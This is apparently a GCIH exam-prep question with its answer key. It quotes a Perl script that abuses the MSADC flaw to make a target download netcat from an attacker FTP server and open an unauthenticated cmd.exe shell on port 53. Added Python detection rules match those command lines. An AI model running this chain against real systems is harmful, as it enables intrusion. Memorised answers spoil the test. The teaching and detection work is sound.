
GCIH Question #278: Real Exam Question with Answer & Explanation

The correct answer is D: Opens up a telnet listener that requires no username or password. The script exploits the MSADC vulnerability to download netcat (nc.exe) to a target system and use it to open a backdoor shell listener on port 53 with no authentication.

Question

Adam, a malicious hacker, performs an exploit, which is given below:

    #####################################################
    $port = 53;                  # Spawn cmd.exe on port X
    $your = "192.168.1.1";       # Your FTP Server 89
    $user = "Anonymous";         # login as
    $pass = '[email protected]';   # password
    #####################################################
    $host = $ARGV[0];
    print "Starting ...\n";
    print "Server will download the file nc.exe from $your FTP server.\n";
    system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
    print "Server is downloading ... \n";
    system("perl msadc.pl -h $host -C \"ftp -s:sasfile\"");
    print "Press ENTER when download is finished ... (Have a ftp server)\n";
    $o = <STDIN>;
    print "Opening ...\n";
    system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
    print "Done.\n";
    #system("telnet $host $port");
    exit(0);

Which of the following is the expected result of the above exploit?

Options

  • A. Creates a share called "sasfile" on the target system
  • B. Creates an FTP server with write permissions enabled
  • C. Opens up an SMTP server that requires no username or password
  • D. Opens up a telnet listener that requires no username or password

Explanation

The script exploits the MSADC vulnerability to download netcat (nc.exe) to a target system and use it to open a backdoor shell listener on port 53 with no authentication.
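As an added, defender-side example that is not part of the exam material, the following Python flags the two observable stages of this chain: a burst of requests to msadcs.dll in IIS logs (every msadc.pl call is one RDS request), and the echo / ftp -s: / nc -l -p ... -e cmd.exe command lines on the host. The log layout, the sample log lines and the sample command lines are constructed; the /msadc/msadcs.dll path is the RDS endpoint the msadc.pl tool drives.

```python
import re
from collections import Counter

# Constructed IIS W3C-style log lines (date time s-ip method uri-stem port c-ip status); not real data.
SAMPLE_LOG = """\
2024-01-01 10:00:01 10.0.0.5 GET /default.htm 80 203.0.113.9 200
2024-01-01 10:00:07 10.0.0.5 POST /msadc/msadcs.dll/AdvancedDataFactory.Query 80 198.51.100.7 200
2024-01-01 10:00:08 10.0.0.5 POST /msadc/msadcs.dll/AdvancedDataFactory.Query 80 198.51.100.7 200
2024-01-01 10:00:09 10.0.0.5 POST /msadc/msadcs.dll/AdvancedDataFactory.Query 80 198.51.100.7 200
2024-01-01 10:00:30 10.0.0.5 GET /images/logo.gif 80 203.0.113.9 200
"""

# Constructed process command lines, as an EDR or Sysmon process-creation event might record them.
SAMPLE_CMDLINES = [
    "cmd.exe /c echo open 192.168.1.1 >sasfile",
    "cmd.exe /c ftp -s:sasfile",
    "cmd.exe /c nc -l -p 53 -e cmd.exe",
    "notepad.exe C:\\report.txt",
]

MSADC_RE = re.compile(r"/msadc/msadcs\.dll", re.I)

def msadc_bursts(log_text, threshold=3):
    """Map client IP -> hit count for clients with at least `threshold` requests to
    msadcs.dll; the script's chained commands arrive as a burst from one source."""
    counts = Counter()
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) >= 7 and MSADC_RE.search(fields[4]):
            counts[fields[6]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

# One rule per stage run on the target: build the ftp script with echo, fetch nc.exe
# with scripted ftp, then bind cmd.exe to a port with netcat.
CMDLINE_RULES = [
    (re.compile(r"\becho\b.*>>?\s*\S+", re.I), "echo redirect writing a script file"),
    (re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I), "scripted ftp transfer (ftp -s:)"),
    (re.compile(r"\bnc(\.exe)?\b.*\s-l\b.*\s-p\s*\d+.*\s-e\s+cmd(\.exe)?", re.I),
     "netcat listener serving a shell to whoever connects (-l -p <port> -e cmd.exe)"),
]

def classify_cmdline(cmdline):
    """Return the reasons a command line matches the backdoor chain ([] if none)."""
    return [reason for rx, reason in CMDLINE_RULES if rx.search(cmdline)]

if __name__ == "__main__":
    print(msadc_bursts(SAMPLE_LOG))
    for c in SAMPLE_CMDLINES:
        print(c, "->", classify_cmdline(c))
```

A TCP listener on port 53 served by cmd.exe rather than a DNS service is the other host-side tell; the port was picked to blend in with DNS traffic on most firewalls.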

Common mistakes.

  • A. The script creates a local FTP command script file named 'sasfile' on the target to automate the FTP download session - it does not create a network share.
  • B. The attacker's machine hosts the FTP server; the script instructs the compromised target to download nc.exe from that server, not to create a new FTP server with write permissions.
  • C. The script has no SMTP-related functionality; it uses FTP for file transfer and netcat to open a shell, with no mail server components involved.

Concept tested. MSADC exploit and netcat backdoor shell

Reference. https://owasp.org/www-community/attacks/Command_Injection
